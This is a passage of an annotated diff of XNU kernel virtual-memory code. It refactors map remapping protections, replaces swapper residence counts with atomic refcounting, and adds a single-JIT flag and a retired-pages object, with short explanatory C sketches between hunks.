                                /*
                                 * This entry uses "IOKit accounting".
@@ -16663,6 +16693,7 @@ vm_map_remap_extract(
                                VME_OFFSET_SET(src_entry, 0);
                                VME_OBJECT_SET(src_entry, object);
                                assert(src_entry->use_pmap);
+                               assert(!map->mapped_in_other_pmaps);
                        } else if (src_entry->wired_count ||
                            object->copy_strategy != MEMORY_OBJECT_COPY_SYMMETRIC) {
                                /*
@@ -16756,6 +16787,7 @@ vm_map_remap_extract(
                                 */
                                object->copy_strategy =
                                    MEMORY_OBJECT_COPY_DELAY;
+                               object->true_share = TRUE;
                        }
                        vm_object_unlock(object);
                }
@@ -16801,6 +16833,10 @@ vm_map_remap_extract(
                        new_entry->max_protection |= VM_PROT_WRITE;
                } else {
                        new_entry->inheritance = inheritance;
+                       if (!vm_remap_legacy) {
+                               new_entry->protection = *cur_protection;
+                               new_entry->max_protection = *max_protection;
+                       }
                }
                VME_OFFSET_SET(new_entry, offset);
 
@@ -16978,8 +17014,8 @@ RestartCopy:
                _vm_map_store_entry_link(map_header,
                    map_header->links.prev, new_entry);
 
-               /*Protections for submap mapping are irrelevant here*/
-               if (!src_entry->is_sub_map) {
+               /* protections for submap mapping are irrelevant here */
+               if (vm_remap_legacy && !src_entry->is_sub_map) {
                        *cur_protection &= src_entry->protection;
                        *max_protection &= src_entry->max_protection;
                }
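
In legacy mode (vm_remap_legacy), the protections handed back through *cur_protection and *max_protection are the bitwise intersection of every copied source entry's protections; on the non-legacy path they are inputs, applied to new_entry earlier in this diff and left untouched here. A minimal sketch of the legacy-mode reporting, using the conventional VM_PROT_* bit values as stand-ins (illustration only, not kernel code):

#include <stdio.h>

#define VM_PROT_READ    0x1u
#define VM_PROT_WRITE   0x2u
#define VM_PROT_EXECUTE 0x4u
#define VM_PROT_ALL     (VM_PROT_READ | VM_PROT_WRITE | VM_PROT_EXECUTE)

int main(void)
{
    /* protections of three source entries covered by the extract */
    unsigned int src_entry_prot[3] = {
        VM_PROT_READ | VM_PROT_WRITE,
        VM_PROT_READ | VM_PROT_WRITE | VM_PROT_EXECUTE,
        VM_PROT_READ
    };
    unsigned int cur_protection = VM_PROT_ALL;

    for (int i = 0; i < 3; i++) {
        cur_protection &= src_entry_prot[i];   /* *cur_protection &= src_entry->protection */
    }
    /* the caller learns the strongest protection valid for the whole range: 0x1, read-only */
    printf("reported cur_protection = 0x%x\n", cur_protection);
    return 0;
}
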
@@ -17045,6 +17081,15 @@ vm_map_mark_alien(
        map->is_alien = true;
        vm_map_unlock(map);
 }
+
+void
+vm_map_single_jit(
+       vm_map_t map)
+{
+       vm_map_lock(map);
+       map->single_jit = true;
+       vm_map_unlock(map);
+}
 #endif /* XNU_TARGET_OS_OSX */
 
 void vm_map_copy_to_physcopy(vm_map_copy_t copy_map, vm_map_t target_map);
@@ -17622,8 +17667,9 @@ vm_map_range_physical_size(
        vmk_flags.vmkf_copy_pageable = TRUE;
        vmk_flags.vmkf_copy_same_map = TRUE;
        assert(adjusted_size != 0);
+       cur_prot = VM_PROT_NONE; /* legacy mode */
+       max_prot = VM_PROT_NONE; /* legacy mode */
        kr = vm_map_copy_extract(map, adjusted_start, adjusted_size,
-           VM_PROT_NONE, /* required_protection: no check here */
            FALSE /* copy */,
            &copy_map,
            &cur_prot, &max_prot, VM_INHERIT_DEFAULT,
@@ -17679,7 +17725,7 @@ memory_entry_check_for_adjustment(
 
        vm_named_entry_t        named_entry;
 
-       named_entry = (vm_named_entry_t) port->ip_kobject;
+       named_entry = (vm_named_entry_t) ipc_kobject_get(port);
        named_entry_lock(named_entry);
        copy_map = named_entry->backing.copy;
        target_copy_map = copy_map;
@@ -17730,8 +17776,8 @@ vm_map_remap(
        vm_map_t                src_map,
        vm_map_offset_t         memory_address,
        boolean_t               copy,
-       vm_prot_t               *cur_protection,
-       vm_prot_t               *max_protection,
+       vm_prot_t               *cur_protection, /* IN/OUT */
+       vm_prot_t               *max_protection, /* IN/OUT */
        vm_inherit_t            inheritance)
 {
        kern_return_t           result;
@@ -17841,10 +17887,9 @@ vm_map_remap(
        result = vm_map_copy_extract(src_map,
            memory_address,
            size,
-           VM_PROT_NONE, /* required_protection: no check here */
            copy, &copy_map,
-           cur_protection,
-           max_protection,
+           cur_protection, /* IN/OUT */
+           max_protection, /* IN/OUT */
            inheritance,
            vmk_flags);
        if (result != KERN_SUCCESS) {
@@ -19641,7 +19686,7 @@ convert_port_entry_to_map(
                                        mach_destroy_memory_entry(port);
                                        return VM_MAP_NULL;
                                }
-                               vm_map_reference_swap(map);
+                               vm_map_reference(map);
                                mach_destroy_memory_entry(port);
                                break;
                        } else {
@@ -19726,27 +19771,16 @@ current_map(void)
 /*
  *     vm_map_reference:
  *
- *     Most code internal to the osfmk will go through a
- *     macro defining this.  This is always here for the
- *     use of other kernel components.
+ *     Takes a reference on the specified map.
  */
-#undef vm_map_reference
 void
 vm_map_reference(
        vm_map_t        map)
 {
-       if (map == VM_MAP_NULL) {
-               return;
+       if (__probable(map != VM_MAP_NULL)) {
+               vm_map_require(map);
+               os_ref_retain(&map->map_refcnt);
        }
-
-       lck_mtx_lock(&map->s_lock);
-#if     TASK_SWAPPER
-       assert(map->res_count > 0);
-       assert(os_ref_get_count(&map->map_refcnt) >= map->res_count);
-       map->res_count++;
-#endif
-       os_ref_retain_locked(&map->map_refcnt);
-       lck_mtx_unlock(&map->s_lock);
 }
 
 /*
@@ -19760,32 +19794,12 @@ void
 vm_map_deallocate(
        vm_map_t        map)
 {
-       unsigned int            ref;
-
-       if (map == VM_MAP_NULL) {
-               return;
-       }
-
-       lck_mtx_lock(&map->s_lock);
-       ref = os_ref_release_locked(&map->map_refcnt);
-       if (ref > 0) {
-               vm_map_res_deallocate(map);
-               lck_mtx_unlock(&map->s_lock);
-               return;
+       if (__probable(map != VM_MAP_NULL)) {
+               vm_map_require(map);
+               if (os_ref_release(&map->map_refcnt) == 0) {
+                       vm_map_destroy(map, VM_MAP_REMOVE_NO_FLAGS);
+               }
        }
-       assert(os_ref_get_count(&map->map_refcnt) == 0);
-       lck_mtx_unlock(&map->s_lock);
-
-#if     TASK_SWAPPER
-       /*
-        * The map residence count isn't decremented here because
-        * the vm_map_delete below will traverse the entire map,
-        * deleting entries, and the residence counts on objects
-        * and sharing maps will go away then.
-        */
-#endif
-
-       vm_map_destroy(map, VM_MAP_REMOVE_NO_FLAGS);
 }
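
vm_map_reference() and vm_map_deallocate() no longer take map->s_lock or do TASK_SWAPPER residence bookkeeping: a reference is an atomic retain on map_refcnt, and releasing the last reference destroys the map (vm_map_require(), declared later in this diff, runs first and is not modelled here). A sketch of that retain/release shape in plain C11 atomics rather than XNU's os_refcnt:

#include <stdatomic.h>
#include <stdlib.h>

struct toy_map {
    atomic_uint refcnt;                 /* stands in for os_refcnt map_refcnt */
};

static void
toy_map_reference(struct toy_map *map)
{
    if (map != NULL) {
        atomic_fetch_add_explicit(&map->refcnt, 1, memory_order_relaxed);
    }
}

static void
toy_map_deallocate(struct toy_map *map)
{
    if (map != NULL &&
        atomic_fetch_sub_explicit(&map->refcnt, 1, memory_order_acq_rel) == 1) {
        free(map);                      /* last reference gone: destroy, as vm_map_destroy() does */
    }
}

int main(void)
{
    struct toy_map *m = calloc(1, sizeof(*m));
    if (m == NULL) {
        return 1;
    }
    atomic_init(&m->refcnt, 1);         /* creator holds the first reference */
    toy_map_reference(m);               /* refcnt 2 */
    toy_map_deallocate(m);              /* refcnt 1 */
    toy_map_deallocate(m);              /* refcnt 0: freed */
    return 0;
}
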
 
 void
index cd1364f2b1b97fc160aab6166e937f74efc834e8..dca074ab68550129587231a4b9a9a8f988624c19 100644
@@ -109,7 +109,6 @@ __END_DECLS
 
 #ifdef  MACH_KERNEL_PRIVATE
 
-#include <task_swapper.h>
 #include <mach_assert.h>
 
 #include <vm/vm_object.h>
@@ -467,9 +466,9 @@ struct _vm_map {
        vm_map_size_t           size;           /* virtual size */
        vm_map_size_t           user_wire_limit;/* rlimit on user locked memory */
        vm_map_size_t           user_wire_size; /* current size of user locked memory in this map */
-#if !CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
        vm_map_offset_t         vmmap_high_start;
-#endif
+#endif /* XNU_TARGET_OS_OSX */
 
        union {
                /*
@@ -504,31 +503,27 @@ struct _vm_map {
 #define first_free              f_s._first_free
 #define holes_list              f_s._holes
 
-       struct os_refcnt        map_refcnt;     /* Reference count */
-
-#if     TASK_SWAPPER
-       int                     res_count;      /* Residence count (swap) */
-       int                     sw_state;       /* Swap state */
-#endif  /* TASK_SWAPPER */
+       struct os_refcnt        map_refcnt;       /* Reference count */
 
        unsigned int
        /* boolean_t */ wait_for_space:1,         /* Should callers wait for space? */
-       /* boolean_t */ wiring_required:1,         /* All memory wired? */
-       /* boolean_t */ no_zero_fill:1,         /*No zero fill absent pages */
-       /* boolean_t */ mapped_in_other_pmaps:1,         /*has this submap been mapped in maps that use a different pmap */
-       /* boolean_t */ switch_protect:1,         /*  Protect map from write faults while switched */
-       /* boolean_t */ disable_vmentry_reuse:1,         /*  All vm entries should keep using newer and higher addresses in the map */
-       /* boolean_t */ map_disallow_data_exec:1,         /* Disallow execution from data pages on exec-permissive architectures */
+       /* boolean_t */ wiring_required:1,        /* All memory wired? */
+       /* boolean_t */ no_zero_fill:1,           /* No zero fill absent pages */
+       /* boolean_t */ mapped_in_other_pmaps:1,  /* has this submap been mapped in maps that use a different pmap */
+       /* boolean_t */ switch_protect:1,         /* Protect map from write faults while switched */
+       /* boolean_t */ disable_vmentry_reuse:1,  /* All vm entries should keep using newer and higher addresses in the map */
+       /* boolean_t */ map_disallow_data_exec:1, /* Disallow execution from data pages on exec-permissive architectures */
        /* boolean_t */ holelistenabled:1,
        /* boolean_t */ is_nested_map:1,
-       /* boolean_t */ map_disallow_new_exec:1,         /* Disallow new executable code */
+       /* boolean_t */ map_disallow_new_exec:1, /* Disallow new executable code */
        /* boolean_t */ jit_entry_exists:1,
        /* boolean_t */ has_corpse_footprint:1,
        /* boolean_t */ terminated:1,
-       /* boolean_t */ is_alien:1,             /* for platform simulation, i.e. PLATFORM_IOS on OSX */
-       /* boolean_t */ cs_enforcement:1,       /* code-signing enforcement */
-       /* boolean_t */ reserved_regions:1,       /* has reserved regions. The map size that userspace sees should ignore these. */
-       /* reserved */ pad:16;
+       /* boolean_t */ is_alien:1,              /* for platform simulation, i.e. PLATFORM_IOS on OSX */
+       /* boolean_t */ cs_enforcement:1,        /* code-signing enforcement */
+       /* boolean_t */ reserved_regions:1,      /* has reserved regions. The map size that userspace sees should ignore these. */
+       /* boolean_t */ single_jit:1,            /* only allow one JIT mapping */
+       /* reserved */ pad:15;
        unsigned int            timestamp;      /* Version number */
 };
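
Adding single_jit:1 is paid for by shrinking the reserved pad from 16 to 15 bits, so the seventeen one-bit flags plus the pad still fill exactly one 32-bit flag word. A quick check of that arithmetic (toy struct; assumes the usual ABI where such a bit-field packs into one unsigned int):

#include <assert.h>

struct toy_flag_word {
    unsigned int flags:17, pad:15;      /* 17 + 15 = 32 bits */
};
static_assert(sizeof(struct toy_flag_word) == sizeof(unsigned int),
    "the new bit must come out of pad, not grow the flag word");

int main(void)
{
    return 0;
}
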
 
@@ -537,14 +532,6 @@ struct _vm_map {
 #define vm_map_first_entry(map) ((map)->hdr.links.next)
 #define vm_map_last_entry(map)  ((map)->hdr.links.prev)
 
-#if     TASK_SWAPPER
-/*
- * VM map swap states.  There are no transition states.
- */
-#define MAP_SW_IN        1      /* map is swapped in; residence count > 0 */
-#define MAP_SW_OUT       2      /* map is out (res_count == 0 */
-#endif  /* TASK_SWAPPER */
-
 /*
  *     Type:           vm_map_version_t [exported; contents invisible]
  *
@@ -828,97 +815,9 @@ extern vm_map_entry_t   vm_map_entry_insert(
 /* Physical map associated
 * with this address map */
 
-/*
- * Macros/functions for map residence counts and swapin/out of vm maps
- */
-#if     TASK_SWAPPER
-
-#if     MACH_ASSERT
 /* Gain a reference to an existing map */
 extern void             vm_map_reference(
        vm_map_t        map);
-/* Lose a residence count */
-extern void             vm_map_res_deallocate(
-       vm_map_t        map);
-/* Gain a residence count on a map */
-extern void             vm_map_res_reference(
-       vm_map_t        map);
-/* Gain reference & residence counts to possibly swapped-out map */
-extern void             vm_map_reference_swap(
-       vm_map_t        map);
-
-#else   /* MACH_ASSERT */
-
-#define vm_map_reference(map)           \
-MACRO_BEGIN                                      \
-       vm_map_t Map = (map);                    \
-       if (Map) {                               \
-               lck_mtx_lock(&Map->s_lock);      \
-               Map->res_count++;                \
-               os_ref_retain(&Map->map_refcnt); \
-               lck_mtx_unlock(&Map->s_lock);    \
-       }                                        \
-MACRO_END
-
-#define vm_map_res_reference(map)               \
-MACRO_BEGIN                                     \
-       vm_map_t Lmap = (map);          \
-       if (Lmap->res_count == 0) {             \
-               lck_mtx_unlock(&Lmap->s_lock);\
-               vm_map_lock(Lmap);              \
-               vm_map_swapin(Lmap);            \
-               lck_mtx_lock(&Lmap->s_lock);    \
-               ++Lmap->res_count;              \
-               vm_map_unlock(Lmap);            \
-       } else                                  \
-               ++Lmap->res_count;              \
-MACRO_END
-
-#define vm_map_res_deallocate(map)              \
-MACRO_BEGIN                                     \
-       vm_map_t Map = (map);           \
-       if (--Map->res_count == 0) {    \
-               lck_mtx_unlock(&Map->s_lock);   \
-               vm_map_lock(Map);               \
-               vm_map_swapout(Map);            \
-               vm_map_unlock(Map);             \
-               lck_mtx_lock(&Map->s_lock);     \
-       }                                       \
-MACRO_END
-
-#define vm_map_reference_swap(map)      \
-MACRO_BEGIN                             \
-       vm_map_t Map = (map);           \
-       lck_mtx_lock(&Map->s_lock);     \
-       os_ref_retain(&Map->map_refcnt);\
-       vm_map_res_reference(Map);      \
-       lck_mtx_unlock(&Map->s_lock);   \
-MACRO_END
-#endif  /* MACH_ASSERT */
-
-extern void             vm_map_swapin(
-       vm_map_t        map);
-
-extern void             vm_map_swapout(
-       vm_map_t        map);
-
-#else   /* TASK_SWAPPER */
-
-#define vm_map_reference(map)                   \
-MACRO_BEGIN                                     \
-       vm_map_t Map = (map);                   \
-       if (Map) {                              \
-               lck_mtx_lock(&Map->s_lock);     \
-               os_ref_retain(&Map->map_refcnt);\
-               lck_mtx_unlock(&Map->s_lock);   \
-       }                                       \
-MACRO_END
-
-#define vm_map_reference_swap(map)      vm_map_reference(map)
-#define vm_map_res_reference(map)
-#define vm_map_res_deallocate(map)
-
-#endif  /* TASK_SWAPPER */
 
 /*
  *     Submap object.  Must be used to create memory to be put
@@ -939,28 +838,6 @@ extern vm_object_t      vm_submap_object;
        thread_wakeup((event_t)(&(map)->hdr))
 
 
-#define vm_map_ref_fast(map)                    \
-       MACRO_BEGIN                                     \
-       lck_mtx_lock(&map->s_lock);                     \
-       map->ref_count++;                               \
-       vm_map_res_reference(map);                      \
-       lck_mtx_unlock(&map->s_lock);                   \
-       MACRO_END
-
-#define vm_map_dealloc_fast(map)                \
-       MACRO_BEGIN                                     \
-       int c;                                          \
-                                                        \
-       lck_mtx_lock(&map->s_lock);                     \
-       c = --map->ref_count;                   \
-       if (c > 0)                                      \
-               vm_map_res_deallocate(map);             \
-       lck_mtx_unlock(&map->s_lock);                   \
-       if (c == 0)                                     \
-               vm_map_destroy(map);                    \
-       MACRO_END
-
-
 /* simplify map entries */
 extern void             vm_map_simplify_entry(
        vm_map_t        map,
@@ -1384,6 +1261,9 @@ extern kern_return_t    vm_map_enter_mem_object_control(
 extern kern_return_t    vm_map_terminate(
        vm_map_t                map);
 
+extern void             vm_map_require(
+       vm_map_t                map);
+
 #endif /* !XNU_KERNEL_PRIVATE */
 
 /* Deallocate a region */
@@ -1475,7 +1355,6 @@ extern kern_return_t    vm_map_copy_extract(
        vm_map_t                src_map,
        vm_map_address_t        src_addr,
        vm_map_size_t           len,
-       vm_prot_t               required_prot,
        boolean_t               copy,
        vm_map_copy_t           *copy_result,   /* OUT */
        vm_prot_t               *cur_prot,      /* OUT */
@@ -1529,11 +1408,11 @@ extern kern_return_t    vm_map_raise_max_offset(
 extern kern_return_t    vm_map_raise_min_offset(
        vm_map_t        map,
        vm_map_offset_t new_min_offset);
-#if !CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
 extern void vm_map_set_high_start(
        vm_map_t        map,
        vm_map_offset_t high_start);
-#endif
+#endif /* XNU_TARGET_OS_OSX */
 
 extern vm_map_offset_t  vm_compute_max_offset(
        boolean_t               is64);
@@ -1607,6 +1486,7 @@ mach_vm_range_overflows(mach_vm_offset_t addr, mach_vm_size_t size)
 
 #if XNU_TARGET_OS_OSX
 extern void vm_map_mark_alien(vm_map_t map);
+extern void vm_map_single_jit(vm_map_t map);
 #endif /* XNU_TARGET_OS_OSX */
 
 extern kern_return_t vm_map_page_info(
@@ -1716,7 +1596,7 @@ static inline bool
 VM_MAP_POLICY_ALLOW_MULTIPLE_JIT(
        vm_map_t map __unused)
 {
-       if (VM_MAP_IS_ALIEN(map)) {
+       if (VM_MAP_IS_ALIEN(map) || map->single_jit) {
                return false;
        }
        return true;
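
This is where the new single_jit bit takes effect: once vm_map_single_jit() has set it, VM_MAP_POLICY_ALLOW_MULTIPLE_JIT() answers false and only the first MAP_JIT region is accepted for that map. A toy restatement of the policy check (toy map type, not the kernel's vm_map_t):

#include <stdbool.h>
#include <stdio.h>

struct toy_map {
    bool is_alien;      /* platform simulation, e.g. PLATFORM_IOS on macOS */
    bool single_jit;    /* set once via vm_map_single_jit() */
};

static bool
allow_multiple_jit(const struct toy_map *map)
{
    if (map->is_alien || map->single_jit) {
        return false;
    }
    return true;
}

int main(void)
{
    struct toy_map m = { .is_alien = false, .single_jit = true };
    printf("multiple JIT regions allowed: %s\n", allow_multiple_jit(&m) ? "yes" : "no");
    return 0;
}
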
index b7a718aea16d8e709529455e430453ba88cf43fd..178a195525ad1acf31aab41c123cffe836756985 100644
@@ -64,7 +64,6 @@
 
 #include <debug.h>
 #include <mach_pagemap.h>
-#include <task_swapper.h>
 
 #include <mach/mach_types.h>
 #include <mach/memory_object.h>
@@ -244,10 +243,18 @@ SECURITY_READ_ONLY_LATE(zone_t) vm_object_zone; /* vm backing store zone */
  *     memory object (kernel_object) to avoid wasting data structures.
  */
 static struct vm_object                 kernel_object_store VM_PAGE_PACKED_ALIGNED;
-vm_object_t                             kernel_object;
+SECURITY_READ_ONLY_LATE(vm_object_t)    kernel_object = &kernel_object_store;
 
 static struct vm_object                 compressor_object_store VM_PAGE_PACKED_ALIGNED;
-vm_object_t                             compressor_object = &compressor_object_store;
+SECURITY_READ_ONLY_LATE(vm_object_t)    compressor_object = &compressor_object_store;
+
+/*
+ * This object holds all pages that have been retired due to errors like ECC.
+ * The system should never use the page or look at its contents. The offset
+ * in this object is the same as the page's physical address.
+ */
+static struct vm_object                 retired_pages_object_store VM_PAGE_PACKED_ALIGNED;
+SECURITY_READ_ONLY_LATE(vm_object_t)    retired_pages_object = &retired_pages_object_store;
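
retired_pages_object is where pages pulled out of service (ECC or similar errors) are parked so nothing can use or read them again; as the comment above says, a page's offset in this object is simply its physical address. A small sketch of that offset convention (the 16 KiB page size is an assumption made for the example):

#include <stdint.h>
#include <stdio.h>

#define TOY_PAGE_SHIFT 14   /* assumed 16 KiB pages, for illustration only */

/* offset of a retired page inside retired_pages_object == its physical address */
static uint64_t
retired_offset(uint32_t phys_page_num)
{
    return (uint64_t)phys_page_num << TOY_PAGE_SHIFT;
}

int main(void)
{
    printf("offset for ppn 0x1234 = 0x%llx\n",
        (unsigned long long)retired_offset(0x1234));
    return 0;
}
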
 
 /*
  *     The submap object is used as a placeholder for vm_map_submap
@@ -256,6 +263,8 @@ vm_object_t                             compressor_object = &compressor_object_s
  *     here because it must be initialized here.
  */
 static struct vm_object                 vm_submap_object_store VM_PAGE_PACKED_ALIGNED;
+SECURITY_READ_ONLY_LATE(vm_object_t)    vm_submap_object = &vm_submap_object_store;
+
 
 /*
  *     Virtual memory objects are initialized from
@@ -279,9 +288,6 @@ static const struct vm_object vm_object_template = {
        .vo_size = 0,
        .memq_hint = VM_PAGE_NULL,
        .ref_count = 1,
-#if     TASK_SWAPPER
-       .res_count = 1,
-#endif  /* TASK_SWAPPER */
        .resident_page_count = 0,
        .wired_page_count = 0,
        .reusable_page_count = 0,
@@ -554,7 +560,7 @@ vm_object_bootstrap(void)
            ZC_NOENCRYPT | ZC_ALIGNMENT_REQUIRED,
            ZONE_ID_ANY, ^(zone_t z){
 #if defined(__LP64__)
-               zone_set_submap_idx(z, Z_SUBMAP_IDX_VA_RESTRICTED_MAP);
+               zone_set_submap_idx(z, Z_SUBMAP_IDX_VA_RESTRICTED);
 #else
                (void)z;
 #endif
@@ -568,30 +574,28 @@ vm_object_bootstrap(void)
         *      Initialize the "kernel object"
         */
 
-       kernel_object = &kernel_object_store;
-
-/*
- *     Note that in the following size specifications, we need to add 1 because
- *     VM_MAX_KERNEL_ADDRESS (vm_last_addr) is a maximum address, not a size.
- */
-
-       _vm_object_allocate(VM_MAX_KERNEL_ADDRESS + 1,
-           kernel_object);
-
-       _vm_object_allocate(VM_MAX_KERNEL_ADDRESS + 1,
-           compressor_object);
+       /*
+        * Note that in the following size specifications, we need to add 1 because
+        * VM_MAX_KERNEL_ADDRESS (vm_last_addr) is a maximum address, not a size.
+        */
+       _vm_object_allocate(VM_MAX_KERNEL_ADDRESS + 1, kernel_object);
+       _vm_object_allocate(VM_MAX_KERNEL_ADDRESS + 1, compressor_object);
        kernel_object->copy_strategy = MEMORY_OBJECT_COPY_NONE;
        compressor_object->copy_strategy = MEMORY_OBJECT_COPY_NONE;
        kernel_object->no_tag_update = TRUE;
 
+       /*
+        * The object to hold retired VM pages.
+        */
+       _vm_object_allocate(VM_MAX_KERNEL_ADDRESS + 1, retired_pages_object);
+       retired_pages_object->copy_strategy = MEMORY_OBJECT_COPY_NONE;
+
        /*
         *      Initialize the "submap object".  Make it as large as the
         *      kernel object so that no limit is imposed on submap sizes.
         */
 
-       vm_submap_object = &vm_submap_object_store;
-       _vm_object_allocate(VM_MAX_KERNEL_ADDRESS + 1,
-           vm_submap_object);
+       _vm_object_allocate(VM_MAX_KERNEL_ADDRESS + 1, vm_submap_object);
        vm_submap_object->copy_strategy = MEMORY_OBJECT_COPY_NONE;
 
        /*
@@ -666,7 +670,7 @@ vm_object_deallocate(
                return;
        }
 
-       if (object == kernel_object || object == compressor_object) {
+       if (object == kernel_object || object == compressor_object || object == retired_pages_object) {
                vm_object_lock_shared(object);
 
                OSAddAtomic(-1, &object->ref_count);
@@ -674,6 +678,8 @@ vm_object_deallocate(
                if (object->ref_count == 0) {
                        if (object == kernel_object) {
                                panic("vm_object_deallocate: losing kernel_object\n");
+                       } else if (object == retired_pages_object) {
+                               panic("vm_object_deallocate: losing retired_pages_object\n");
                        } else {
                                panic("vm_object_deallocate: losing compressor_object\n");
                        }
@@ -805,7 +811,6 @@ vm_object_deallocate(
                if ((object->ref_count > 1) || object->terminating) {
                        vm_object_lock_assert_exclusive(object);
                        object->ref_count--;
-                       vm_object_res_deallocate(object);
 
                        if (object->ref_count == 1 &&
                            object->shadow != VM_OBJECT_NULL) {
@@ -847,7 +852,6 @@ vm_object_deallocate(
                        continue;
                }
 
-               VM_OBJ_RES_DECR(object);        /* XXX ? */
                /*
                 *      Terminate this object. If it had a shadow,
                 *      then deallocate it; otherwise, if we need
@@ -928,7 +932,7 @@ vm_object_page_grab(
                        if ((p->vmp_q_state != VM_PAGE_ON_ACTIVE_Q) && p->vmp_reference == TRUE) {
                                vm_page_activate(p);
 
-                               VM_STAT_INCR(reactivations);
+                               counter_inc(&vm_statistics_reactivations);
                                vm_object_page_grab_reactivations++;
                        }
                        vm_page_unlock_queues();
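
This is the first of several places where VM_STAT_INCR(x) becomes counter_inc(&vm_statistics_x); the counters come from the new <kern/counter.h> (the include swap shows up in the vm_pageout.c part of this diff). A common design for such counters, and presumably the intent here, is to keep increments CPU-local and pay the aggregation cost only when the value is read. A toy sketch of that idea, not the actual implementation:

#include <stdint.h>
#include <stdio.h>

#define TOY_NCPU 8   /* assumption for the sketch */

struct toy_counter {
    uint64_t per_cpu[TOY_NCPU];   /* one slot per CPU: no shared hot cache line */
};

static void
toy_counter_inc(struct toy_counter *c, int cpu)
{
    c->per_cpu[cpu]++;            /* cheap, contention-free fast path */
}

static uint64_t
toy_counter_load(const struct toy_counter *c)
{
    uint64_t sum = 0;
    for (int i = 0; i < TOY_NCPU; i++) {
        sum += c->per_cpu[i];     /* readers pay for the summation */
    }
    return sum;
}

int main(void)
{
    struct toy_counter reactivations = { { 0 } };
    toy_counter_inc(&reactivations, 0);
    toy_counter_inc(&reactivations, 3);
    printf("reactivations = %llu\n",
        (unsigned long long)toy_counter_load(&reactivations));
    return 0;
}
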
@@ -1297,7 +1301,6 @@ vm_object_terminate(
                vm_object_lock_assert_exclusive(object);
                object->ref_count--;
                assert(object->ref_count > 0);
-               vm_object_res_deallocate(object);
                vm_object_unlock(object);
                return KERN_FAILURE;
        }
@@ -1443,14 +1446,10 @@ vm_object_reap(
        object->pager = MEMORY_OBJECT_NULL;
 
        if (pager != MEMORY_OBJECT_NULL) {
-               memory_object_control_disable(object->pager_control);
+               memory_object_control_disable(&object->pager_control);
        }
 
        object->ref_count--;
-#if     TASK_SWAPPER
-       assert(object->res_count == 0);
-#endif  /* TASK_SWAPPER */
-
        assert(object->ref_count == 0);
 
        /*
@@ -1646,7 +1645,7 @@ restart_after_sleep:
                pmap_flush_context_init(&pmap_flush_context_storage);
        }
 
-       vm_page_lockspin_queues();
+       vm_page_lock_queues();
 
        next = (vm_page_t)vm_page_queue_first(&object->memq);
 
@@ -1675,7 +1674,7 @@ restart_after_sleep:
 
                        loop_count = BATCH_LIMIT(V_O_R_MAX_BATCH);
 
-                       vm_page_lockspin_queues();
+                       vm_page_lock_queues();
                }
                if (reap_type == REAP_DATA_FLUSH || reap_type == REAP_TERMINATE) {
                        if (p->vmp_busy || p->vmp_cleaning) {
@@ -1974,7 +1973,7 @@ vm_object_destroy(
        old_pager = object->pager;
        object->pager = MEMORY_OBJECT_NULL;
        if (old_pager != MEMORY_OBJECT_NULL) {
-               memory_object_control_disable(object->pager_control);
+               memory_object_control_disable(&object->pager_control);
        }
 
        /*
@@ -3736,13 +3735,6 @@ Retry:
                assert(new_copy->ref_count > 0);
                new_copy->ref_count++;          /* for old_copy->shadow ref. */
 
-#if TASK_SWAPPER
-               if (old_copy->res_count) {
-                       VM_OBJ_RES_INCR(new_copy);
-                       VM_OBJ_RES_DECR(src_object);
-               }
-#endif
-
                vm_object_unlock(old_copy);     /* done with old_copy */
        }
 
@@ -3926,6 +3918,14 @@ vm_object_shadow(
 
        assert(source->copy_strategy != MEMORY_OBJECT_COPY_NONE); /* Purgeable objects shouldn't have shadow objects. */
 
+#if 00
+       /*
+        * The following optimization does not work in the context of submaps
+        * (the shared region, in particular).
+        * This object might have only 1 reference (in the submap) but that
+        * submap can itself be mapped multiple times, so the object is
+        * actually indirectly referenced more than once...
+        */
        if (vm_object_shadow_check &&
            source->vo_size == length &&
            source->ref_count == 1) {
@@ -3951,6 +3951,7 @@ vm_object_shadow(
                /* things changed while we were locking "source"... */
                vm_object_unlock(source);
        }
+#endif /* 00 */
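
The comment explains why the ref_count == 1 fast path is disabled: a single reference held by a submap does not mean a single mapping, because the submap itself (the shared region, for instance) can be mapped into many address spaces. A toy illustration of that situation:

#include <stdio.h>

struct toy_object { int ref_count; };
struct toy_submap { struct toy_object *object; };   /* holds the only reference */
struct toy_map    { struct toy_submap *submap; };

int main(void)
{
    struct toy_object obj = { .ref_count = 1 };
    struct toy_submap shared_region = { .object = &obj };
    struct toy_map task_a = { .submap = &shared_region };
    struct toy_map task_b = { .submap = &shared_region };

    /* ref_count stays 1, yet the object is reachable from two address spaces */
    printf("ref_count = %d, reachable from %d maps\n",
        obj.ref_count, (task_a.submap == task_b.submap) ? 2 : 1);
    return 0;
}
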
 
        /*
         * *offset is the map entry's offset into the VM object and
@@ -4489,7 +4490,7 @@ vm_object_do_collapse(
                object->paging_offset =
                    backing_object->paging_offset + backing_offset;
                if (object->pager_control != MEMORY_OBJECT_CONTROL_NULL) {
-                       memory_object_control_collapse(object->pager_control,
+                       memory_object_control_collapse(&object->pager_control,
                            object);
                }
                /* the backing_object has lost its pager: reset all fields */
@@ -4581,26 +4582,7 @@ vm_object_do_bypass(
        vm_object_lock_assert_exclusive(object);
        vm_object_lock_assert_exclusive(backing_object);
 
-#if     TASK_SWAPPER
-       /*
-        *      Do object reference in-line to
-        *      conditionally increment shadow's
-        *      residence count.  If object is not
-        *      resident, leave residence count
-        *      on shadow alone.
-        */
-       if (backing_object->shadow != VM_OBJECT_NULL) {
-               vm_object_lock(backing_object->shadow);
-               vm_object_lock_assert_exclusive(backing_object->shadow);
-               backing_object->shadow->ref_count++;
-               if (object->res_count != 0) {
-                       vm_object_res_reference(backing_object->shadow);
-               }
-               vm_object_unlock(backing_object->shadow);
-       }
-#else   /* TASK_SWAPPER */
        vm_object_reference(backing_object->shadow);
-#endif  /* TASK_SWAPPER */
 
        assert(!object->phys_contiguous);
        assert(!backing_object->phys_contiguous);
@@ -4654,12 +4636,6 @@ vm_object_do_bypass(
            (!backing_object->named && backing_object->ref_count > 1)) {
                vm_object_lock_assert_exclusive(backing_object);
                backing_object->ref_count--;
-#if     TASK_SWAPPER
-               if (object->res_count != 0) {
-                       vm_object_res_deallocate(backing_object);
-               }
-               assert(backing_object->ref_count > 0);
-#endif  /* TASK_SWAPPER */
                vm_object_unlock(backing_object);
        } else {
                /*
@@ -4667,12 +4643,6 @@ vm_object_do_bypass(
                 *      the backing object.
                 */
 
-#if     TASK_SWAPPER
-               if (object->res_count == 0) {
-                       /* XXX get a reference for the deallocate below */
-                       vm_object_res_reference(backing_object);
-               }
